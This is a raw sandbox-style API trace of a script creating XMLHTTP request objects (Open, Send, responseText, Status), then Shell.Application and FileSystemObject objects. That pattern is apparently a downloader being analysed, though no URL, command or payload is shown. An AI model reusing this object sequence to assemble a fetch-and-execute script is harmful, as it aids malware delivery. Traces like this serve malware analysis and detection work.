	[0265.728] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0265.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0265.728] longjmp () 
	[0265.728] longjmp () 
	[0265.728] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0265.728] SysStringLen (param_1=0x0) returned 0x0
	[0265.728] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0265.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0265.728] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7480) returned 0x0
	[0265.729] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0265.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74e8) returned 0x0
	[0265.729] ??2@YAPEAX_K@Z () returned 0x62f310
	[0265.729] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74e8, pUnkSite=0x62f310) 
	[0265.729] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0265.729] XMLHTTPRequest:IUnknown:Release (This=0x49c74e8) returned 0x0
	[0265.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7480) returned 0x0
	[0265.729] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7480) returned 0x3
	[0265.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0265.729] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0265.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0265.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0265.729] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0265.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0266.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0266.946] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0266.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0266.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0266.947] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0266.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0266.947] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0266.947] SysStringLen (param_1=0x0) returned 0x0
	[0266.947] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0266.947] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0266.947] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0266.947] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0266.947] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0266.947] ??2@YAPEAX_K@Z () returned 0x62f350
	[0266.947] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0266.947] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0266.947] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0266.947] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0266.947] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0266.947] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0266.948] SysStringLen (param_1=0x0) returned 0x0
	[0266.948] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0266.950] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0266.950] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0266.950] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0266.950] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0266.950] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0266.950] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0268.856] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0268.856] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0268.856] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0268.857] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0268.857] SysStringLen (param_1=0x0) returned 0x0
	[0268.857] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0268.857] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0268.857] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7480) returned 0x0
	[0268.857] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0268.858] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0268.858] ??2@YAPEAX_K@Z () returned 0x62f310
	[0268.858] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f310) 
	[0268.858] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0268.858] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0268.858] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7480) returned 0x0
	[0268.858] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7480) returned 0x3
	[0268.858] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0268.858] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0268.860] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0268.860] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0268.860] SysStringLen (param_1=0x0) returned 0x0
	[0268.860] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0268.861] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0268.861] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0268.861] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0268.861] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0268.861] ??2@YAPEAX_K@Z () returned 0x62f330
	[0268.861] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0268.861] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0268.861] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0268.861] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0268.861] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0268.861] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0268.861] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0268.861] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0268.861] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0268.861] SysStringLen (param_1=0x0) returned 0x0
	[0268.861] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0268.861] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0268.861] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0268.862] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0268.862] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0268.862] ??2@YAPEAX_K@Z () returned 0x62f310
	[0268.862] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0268.862] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0268.862] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0268.862] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0268.862] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0268.862] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
